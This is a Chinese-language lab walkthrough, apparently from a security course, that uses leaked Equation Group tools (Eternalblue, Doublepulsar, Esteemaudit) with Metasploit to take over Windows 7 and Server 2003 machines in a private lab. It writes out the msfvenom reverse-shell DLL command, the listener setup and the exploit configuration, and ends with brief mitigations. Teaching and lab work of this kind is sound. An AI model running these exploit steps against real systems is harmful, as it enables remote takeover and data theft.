1、实验环境 操作机:Windows XPo IP : 172.16.11.2 操作机:Kali Linuxo IP : 172.16.12.2 目标机:Windows 7 64 位o IP : 172.16.12.3 目标机:Windows Server 2003o IP : 172.16.12.4 掌握工具的用法以及临时防御措施实验步骤实验工具 Metasploit :是一款开源的安全漏洞检测工具,可以帮助安全和 IT 专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web 应用程序扫描,社会工程等 Equat
2、ion Group Tools:这是一个集成的工具包,里面包含了 IIS6.0、445 端口、3389 端口、Rootkit 等远程利用工具,本次试验我们主要用到它的 445 端口远程入侵功能,以及 3389 远程端口入侵功能。实验内容Shadow Brokers 再次暴露出一份震惊世界的机密文档,其中包含了多个Windows 远程漏洞利用工具,可以覆盖大量的 Windows 服务器,一夜之间所有 Windows 服务器几乎全线暴露在危险之中,任何人都可以直接下载并远程攻击利用,考虑到国内不少高校、政府、国企甚至还有一些互联网公司还在使用 Windows 服务器,这次事件影响力堪称网络大地震。
3、影响版本全球 70% 的 Windows 服务器,包括 Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0危害攻击者通过执行脚本,使目标主机蓝屏重启,获取 Windows 目标主机权限,对目标机器进行任意操作,攻击成本和利用条件都很低,只需在本地执行脚本,并设置相关参数。一旦攻击成功,攻击者能直接控制目标主机,甚至直接下载数据库,盗取商业机密,很多的政府、事业单位都会受到影响,影
4、响极大,危害不言而喻。步骤 1:利用 Eternalblue 与 Doublepulsar 插件,验证 445 SMB 漏洞我们本步骤利用 Eternalblue 和 Doublepulsar 这两个“插件“ 来获取 Windows 7 64 位的系统权限。其中 Eternalblue 可以利用 SMB 漏洞,获取 Windows 7 系统权限而 Doublepulsar 可以加载 Metasploit 生成的恶意 DLL。我们首先进入 cmd 命令行,在命令行中进入文件夹:cd C:EQGRP_Lost_in_Translation-master/Windows输入命令:fb.py /运行
5、python 文件注:在一般情况下需要在工具根目录下创建 listeningposts 文件夹,否则运行文件时,会报错。接下来依次填入对应信息:172.16.12.3 /目标 IP172.16.11.2 /本地 IPno /取消重定向c:logs /指定日志文件目录继续填入相关新信息:0 /创建一个新项目Test_Win7 /项目名称Yes /确认路径到这里就完成了最基本的信息配置,正式启动了脚本,接下来继续进行配置,这时就要用到第一个插件了,使用命令:use Eternalblue /使用 Eternalblue注意这里要选择操作系统、系统位数、传输方式,我们分别选择 Windows 7、6
6、4 位、FB 传输方式,其他配置信息直接按回车键,保持默认即可。当看到 Eternalblue Succeeded 字样,代表成功。接下来需要用到 Metasploit ,使用 Everything 搜索并使用 XShell 连接到 Kali Linux:连接成功后,使用如下命令生成恶意 DLL:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=12399 -f dll win.dll这时,/home 目录下就会生成 win.dll 文件,然后使用如下命令进入 Metasploit,设置 TCP 监听
7、端口,用于接受攻击成功后返回的 Shell:msfconsole use exploit/multi/handler /使用监听模块set payload windows/x64/meterpreter/reverse_tcp /设置 payloadshow options /查看配置信息set LHOST 172.16.12.2 /设置本地 IPset LPORT 12399 /设置本地端口run /运行如图,Metasploit 已经成功运行,等待 Shell 的返回。现在将之前生成的 win.dll 文件通过 FTP 复制到 Windows 机器上:首先点击下图中使用红色小框标示的图标:
8、 本文中,我将 dll 文件放在 C 盘根目录:接下来使用 Doublepulsar 来加载生成的 dll 文件。注:这里系统位数、后门操作、后门路径,我们分别选择 64 位、RunDLL、c:win.dll,其他保持默认即可配置完之后,提示成功。我们再来查看 Metasploit可以看到,成功的利用了插件,已经获取了 Shell。然后退回操作机 cmd命令行下,重新运行 fb.py.准备进行下一步骤.步骤 2:利用 Esteemaudit 插件,验证 3389 RDP 漏洞本步骤利用 Esteemaudit 插件,来验证漏洞存在。(本步骤的目标地址为 172.16.12.4)与上一步骤一样,
9、首先设置基本信息,这里就不在赘述:基本信息配置完成之后,下面对 ESTEEMAUDIT 插件进行配置:use ESTEEMAUDIT /使用 ESTEEMAUDIT 插件这里我将 CallbackPort 设置为 8899 端口(其他端口也可以) 手动加载 rudo_x86.dll 和 capa_x86.dll ,因为插件默认选项都在 D 盘,它不能识别安装目录,我们复制之前位置,位于 C:EQGRP_Lost_in_Translation-masterwindowsstorage ,如图: 手动加载 lipa_x86.dll ,原因同上: 其他保持默认即可。可以看到,成功执行。(同学们也可以
10、使用 3389 端口对 Windows Server 2003 进行登录,目标 IP 为 172.16.12.4,账号密码为 administrator,ichunqiu123. ,使用命令 netstat -ant 查看是否成功连接)实验结果分析与总结本次实验我们成功的使用工具 Eternalblue、Doublepulsar、ESTEEMAUDIT 对SMB、 RDP 协议漏洞进行了演示攻击。临时修复方案 使用防火墙过滤/关闭 137、139、445 端口。 对于 3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。 升级补丁,更新系统。思考本文中对 445 和 3389 端口进行了验证,请在课下尝试对其他的协议、Payload 以及其他系统进行尝试。
